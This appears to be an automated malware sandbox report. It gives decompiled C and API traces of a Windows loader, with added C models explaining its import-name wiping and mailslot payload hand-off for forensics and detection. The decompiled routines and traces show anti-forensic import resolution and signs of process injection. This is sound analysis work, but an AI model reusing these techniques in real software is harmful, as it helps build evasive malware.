  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

Per-line instruction addresses (the report's address column beside the code above, in its original order; 0x00000000 marks a line without a code address): 0x00401389, 0x00401389, 0x00401390, 0x00401395, 0x0040139d, 0x0040147b, 0x00401483, 0x00401483, 0x004013a3, 0x004013a5, 0x004013aa, 0x00000000, 0x00000000, 0x004013b2, 0x004013b2, 0x004013b6, 0x004013be, 0x004013c2, 0x00000000, 0x00000000, 0x004013d3, 0x004013d8, 0x004013da, 0x004013dd, 0x004013e2, 0x004013ea, 0x004013ea, 0x004013ed, 0x004013f1, 0x00401461, 0x00401461, 0x00401464, 0x00401469, 0x00000000, 0x00000000, 0x00401479, 0x00000000, 0x0040147a, 0x004013f7, 0x004013fb, 0x00000000, 0x004013fd, 0x004013fd, 0x00401405, 0x00401414, 0x00401414, 0x004013ff, 0x004013ff, 0x004013ff, 0x00401416, 0x00401416, 0x0040141e, 0x00401426, 0x0040142a, 0x00000000, 0x00000000, 0x0040142e, 0x0040143b, 0x00401440, 0x00401440, 0x0040144b, 0x0040144e, 0x00401451, 0x00401455, 0x00000000, 0x00401457, 0x00000000, 0x00401457, 0x00401459, 0x00401459, 0x00000000, 0x00401459, 0x004013e6, 0x004013e8, 0x00000000, 0x00000000, 0x00000000, 0x004013e8, 0x00401471, 0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
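E00401389 above is a hand-rolled import resolver for the payload the sample maps into memory. It reads the import directory RVA from the NT headers (for a PE32, `_a4 + 0x80` is OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress and `_a4 + 0x50` is SizeOfImage), walks each IMAGE_IMPORT_DESCRIPTOR with the 0x14-byte stride (OriginalFirstThunk at +0, Name at +0xc, FirstThunk at +0x10), resolves every thunk through LoadLibraryA/GetProcAddress and writes the result into the IAT slot, and after each successful lookup zeroes the DLL name and the function name with memset (the lstrlenA/memset pairs in the API list). A failed LoadLibraryA returns 0x7e (ERROR_MOD_NOT_FOUND) at once; a failed GetProcAddress records 0x7f (ERROR_PROC_NOT_FOUND), abandons that DLL and continues with the next descriptor. The added example below is not code from the report or from the sample: it is a portable C model of that walk over a hand-built image, with a fixed lookup table standing in for the Win32 loader (its module handle and export addresses are made up), the NT headers placed at offset 0 instead of at e_lfanew, bounds checks against SizeOfImage that are this example's addition, and ordinals handled by the standard PE rule (IMAGE_ORDINAL_FLAG32 set, ordinal in the low 16 bits) rather than by the decompiled ordinal branch literally.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IMG_SIZE           0x400u
#define ORDINAL_FLAG32     0x80000000u   /* IMAGE_ORDINAL_FLAG32 */
#define ERR_MOD_NOT_FOUND  0x7e          /* the two error codes E00401389 returns */
#define ERR_PROC_NOT_FOUND 0x7f

/* Offsets in the constructed image; with the image at its preferred base they
 * double as RVAs. NT headers are at offset 0 here (a real file: at e_lfanew). */
enum { OFF_DESC = 0x100, OFF_INT = 0x140, OFF_IAT = 0x160,
       OFF_DLL = 0x180, OFF_HINT1 = 0x1a0, OFF_HINT2 = 0x1c0 };

static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void     wr32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* Stand-ins for LoadLibraryA/GetProcAddress. Assumption: a fixed export table
 * with made-up addresses, not the real kernel32 layout. */
static uint32_t fake_load_library(const char *dll) {
    return strcmp(dll, "KERNEL32.dll") == 0 ? 0x75000000u : 0;
}
static uint32_t fake_get_proc(uint32_t hmod, const char *name, uint32_t ordinal) {
    if (hmod != 0x75000000u) return 0;
    if (name == NULL) return ordinal == 7 ? 0x75001070u : 0;
    if (strcmp(name, "CreateThread") == 0) return 0x75001110u;
    if (strcmp(name, "VirtualAlloc") == 0) return 0x75002220u;
    return 0;
}

/* Mirrors E00401389: base = mapped image, nt = its IMAGE_NT_HEADERS. Returns 0,
 * 0x7e when a DLL cannot be loaded (stop), or 0x7f when an export is missing
 * (that DLL is abandoned, the next descriptor is still processed). */
static uint32_t resolve_imports_and_wipe(uint8_t *base, const uint8_t *nt) {
    uint32_t err = 0;
    uint32_t size_of_image = rd32(nt + 0x50);   /* OptionalHeader.SizeOfImage */
    uint32_t import_rva    = rd32(nt + 0x80);   /* DataDirectory[IMPORT].VirtualAddress */
    if (import_rva == 0) return 0;
    for (uint8_t *desc = base + import_rva; rd32(desc + 0x0c) != 0; desc += 0x14) {
        uint32_t name_rva = rd32(desc + 0x0c);
        if (name_rva >= size_of_image) return ERR_MOD_NOT_FOUND;  /* guard added here */
        char *dll = (char *)(base + name_rva);
        uint32_t hmod = fake_load_library(dll);
        if (hmod == 0) return ERR_MOD_NOT_FOUND;
        memset(dll, 0, strlen(dll));                /* wipe the DLL name */
        uint32_t oft = rd32(desc), ft = rd32(desc + 0x10);
        if (oft == 0) oft = ft;                     /* no INT: walk the IAT itself */
        if (oft == 0) continue;
        ptrdiff_t iat_delta = (ptrdiff_t)ft - (ptrdiff_t)oft;   /* _v8 in the decompilation */
        for (uint8_t *thunk = base + oft; rd32(thunk) != 0; thunk += 4) {
            uint32_t t = rd32(thunk), addr;
            if (t & ORDINAL_FLAG32) {               /* by ordinal: standard PE rule */
                addr = fake_get_proc(hmod, NULL, t & 0xffffu);
            } else {
                if (t + 2 >= size_of_image) { err = ERR_PROC_NOT_FOUND; break; }
                char *fn = (char *)(base + t + 2);  /* IMAGE_IMPORT_BY_NAME.Name */
                addr = fake_get_proc(hmod, fn, 0);
                if (addr != 0) memset(fn, 0, strlen(fn));   /* wipe the function name */
            }
            if (addr == 0) { err = ERR_PROC_NOT_FOUND; break; }
            wr32(thunk + iat_delta, addr);          /* fill the IAT slot */
        }
    }
    return err;
}

/* Scans the image for an ASCII string: 1 if present, 0 if not. */
static int image_contains(const uint8_t *img, const char *s) {
    size_t n = strlen(s);
    for (size_t i = 0; i + n <= IMG_SIZE; i++)
        if (memcmp(img + i, s, n) == 0) return 1;
    return 0;
}

/* Constructed image: one descriptor for KERNEL32.dll importing CreateThread and
 * VirtualAlloc by name plus ordinal 7. */
static void build_image(uint8_t *img) {
    memset(img, 0, IMG_SIZE);
    wr32(img + 0x50, IMG_SIZE);                 /* SizeOfImage */
    wr32(img + 0x80, OFF_DESC);                 /* import directory RVA */
    wr32(img + OFF_DESC + 0x00, OFF_INT);       /* OriginalFirstThunk */
    wr32(img + OFF_DESC + 0x0c, OFF_DLL);       /* Name */
    wr32(img + OFF_DESC + 0x10, OFF_IAT);       /* FirstThunk */
    strcpy((char *)img + OFF_DLL, "KERNEL32.dll");
    strcpy((char *)img + OFF_HINT1 + 2, "CreateThread");   /* 2-byte hint, then name */
    strcpy((char *)img + OFF_HINT2 + 2, "VirtualAlloc");
    wr32(img + OFF_INT + 0, OFF_HINT1);
    wr32(img + OFF_INT + 4, OFF_HINT2);
    wr32(img + OFF_INT + 8, ORDINAL_FLAG32 | 7u);
    memcpy(img + OFF_IAT, img + OFF_INT, 16);   /* unbound IAT mirrors the INT */
}

int main(void) {
    uint8_t img[IMG_SIZE];
    build_image(img);
    uint32_t rc = resolve_imports_and_wipe(img, img);
    printf("rc=0x%x IAT[0]=0x%08x IAT[2]=0x%08x; import names left in image: %d\n",
           (unsigned)rc, (unsigned)rd32(img + OFF_IAT), (unsigned)rd32(img + OFF_IAT + 8),
           image_contains(img, "CreateThread") || image_contains(img, "KERNEL32"));
    return 0;
}
```

The point for forensics is the wipe: once this routine has run, a dump of the mapped payload carries a populated IAT but no import name strings, so `strings` on the dump and a static import parser both come up empty, and rebuilding the import table means mapping each IAT pointer back to the exporting module and symbol, as import reconstructors do. The INT keeps only RVAs, so it survives the wipe but names nothing by itself.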
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

Per-line instruction addresses (the report's address column beside the code above, in its original order; 0x00000000 marks a line without a code address): 0x00401033, 0x0040103d, 0x0040104c, 0x0040104f, 0x00401057, 0x0040105a, 0x004010d6, 0x004010dc, 0x004010df, 0x0040105c, 0x00401062, 0x00401066, 0x004010c4, 0x004010c4, 0x00401068, 0x00401068, 0x00401076, 0x0040107e, 0x004010a4, 0x004010ad, 0x004010b0, 0x004010b2, 0x00000000, 0x004010b2, 0x00401080, 0x00401080, 0x00401086, 0x00401092, 0x00401098, 0x0040109c, 0x00000000, 0x0040109e, 0x0040109e, 0x00000000, 0x0040109e, 0x0040109c, 0x00000000, 0x004010b5, 0x004010b7, 0x004010bd, 0x004010c2, 0x004010cb, 0x004010ce, 0x004010ce, 0x004010e6, 0x004010e8, 0x004010eb, 0x004010ee, 0x004010ee, 0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
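The two thread routines above, E004010FB (mailslot client, the writer) and E00401033 (mailslot server, the reader), implement a small hand-off protocol over `\\.\mailslot\msl0`; E00401639 starts both from the entry point and only maps the result (E00401593, VirtualAlloc) once both threads have exited with code 0. The added example below is not code from the report or from the sample: it is a portable C model of that exchange, with an in-memory message queue standing in for the Win32 mailslot, so the chunking and termination rules can be run and checked outside Windows. The queue capacity, the payload contents and the helper names are assumptions of the model. What it reproduces from the decompilation: messages are capped at 0x1000 bytes (the nMaxMessageSize passed to CreateMailslotA); the reader grows its buffer by 0x1000 per message with HeapReAlloc and stops at the first message shorter than 0x1000; and when the payload length is an exact multiple of 0x1000 the writer re-sends the last byte as a one-byte message, so, as the decompiled loops read, the receiver ends up with one byte more than was sent. Not modelled, because they need a second thread: the writer's retry of CreateFileA while the error is ERROR_FILE_NOT_FOUND (2), the ERROR_SEM_TIMEOUT (0x79) polling on both sides, and the Sleep(0x64) between attempts.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MSL_MAX_MSG   0x1000u   /* nMaxMessageSize passed to CreateMailslotA */
#define MSL_QUEUE_CAP 64        /* assumption: message backlog the model can hold */

/* Constructed stand-in for the mailslot: a FIFO of discrete messages. A real
 * mailslot hands back exactly one message per ReadFile, which is what lets
 * the message size double as the end-of-stream signal. */
typedef struct {
    const uint8_t *data[MSL_QUEUE_CAP];
    size_t len[MSL_QUEUE_CAP];
    size_t head, tail;
} mailslot_t;

static int msl_write(mailslot_t *m, const uint8_t *p, size_t n) {
    if (m->tail == MSL_QUEUE_CAP) return 0;          /* WriteFile failure */
    m->data[m->tail] = p;
    m->len[m->tail] = n;
    m->tail++;
    return 1;
}

/* Returns 1 with the message length in *got, or 0 when nothing is queued
 * (ReadFile on a mailslot with a zero timeout reports ERROR_SEM_TIMEOUT). */
static int msl_read(mailslot_t *m, uint8_t *out, size_t cap, size_t *got) {
    if (m->head == m->tail) return 0;
    size_t n = m->len[m->head] < cap ? m->len[m->head] : cap;
    memcpy(out, m->data[m->head], n);
    *got = n;
    m->head++;
    return 1;
}

/* Sender thread (E004010FB): messages of at most 0x1000 bytes; if the payload
 * is an exact multiple of 0x1000, re-send its last byte as a 1-byte message
 * so the receiver's "message == 0x1000" loop condition terminates. */
static void sender_send(mailslot_t *m, const uint8_t *buf, size_t remaining) {
    size_t off = 0;
    do {
        size_t chunk = remaining >= MSL_MAX_MSG ? MSL_MAX_MSG : remaining;
        if (!msl_write(m, buf + off, chunk)) break;  /* real loop retries only on 0x79 */
        off += chunk;
        remaining -= chunk;
        if (remaining == 0 && chunk == MSL_MAX_MSG) {
            remaining = 1;                           /* _t46 = _t46 + 1 */
            off -= 1;                                /* _v8 = _v8 - 1 */
        }
    } while (remaining != 0);
}

/* Receiver thread (E00401033): grow the buffer by 0x1000 per message and keep
 * reading while messages are full-sized. Returns the byte count; *out is the
 * heap buffer the caller frees. */
static size_t receiver_recv(mailslot_t *m, uint8_t **out) {
    size_t cap = MSL_MAX_MSG, total = 0, got = 0;
    uint8_t *buf = malloc(cap);
    if (buf == NULL) { *out = NULL; return 0; }
    do {
        if (!msl_read(m, buf + total, MSL_MAX_MSG, &got)) {
            /* Real thread: Sleep(0x64) and poll again. In this single-threaded
             * model nothing more can arrive, so stop here. */
            break;
        }
        total += got;
        cap += MSL_MAX_MSG;                            /* _v12 += 0x1000 */
        uint8_t *grown = realloc(buf, cap);            /* HeapReAlloc(heap, 0, buf, _v12) */
        if (grown == NULL) break;                      /* the sample reports error 8 here */
        buf = grown;
    } while (got == MSL_MAX_MSG);
    *out = buf;
    return total;
}

/* Drives one exchange over a constructed payload (byte i holds i & 0xff) and
 * hands back what the receiver assembled. */
static size_t run_transfer(size_t n, uint8_t **out) {
    mailslot_t slot = {0};
    uint8_t *payload = malloc(n ? n : 1);
    for (size_t i = 0; i < n; i++) payload[i] = (uint8_t)i;
    sender_send(&slot, payload, n);
    size_t total = receiver_recv(&slot, out);
    free(payload);
    return total;
}

int main(void) {
    uint8_t *got;
    size_t n = run_transfer(0x2000, &got);
    printf("payload 0x2000 bytes -> receiver got %zu bytes; last byte duplicated: %s\n",
           n, got[n - 1] == got[n - 2] ? "yes" : "no");
    free(got);
    return 0;
}
```

For detection, the usable fixed points of this protocol are the name `\\.\mailslot\msl0`, the CreateMailslotA/CreateFileA pair inside a single process, and a read loop keyed on a 0x1000-byte message size. A memory dump taken after the transfer holds the reassembled payload in the heap that _entry_ created with HeapCreate (E00401639 stores that handle at 0x40305c and E00401033 passes it to HeapReAlloc), one byte longer than the original whenever the original size was a multiple of 0x1000.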
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
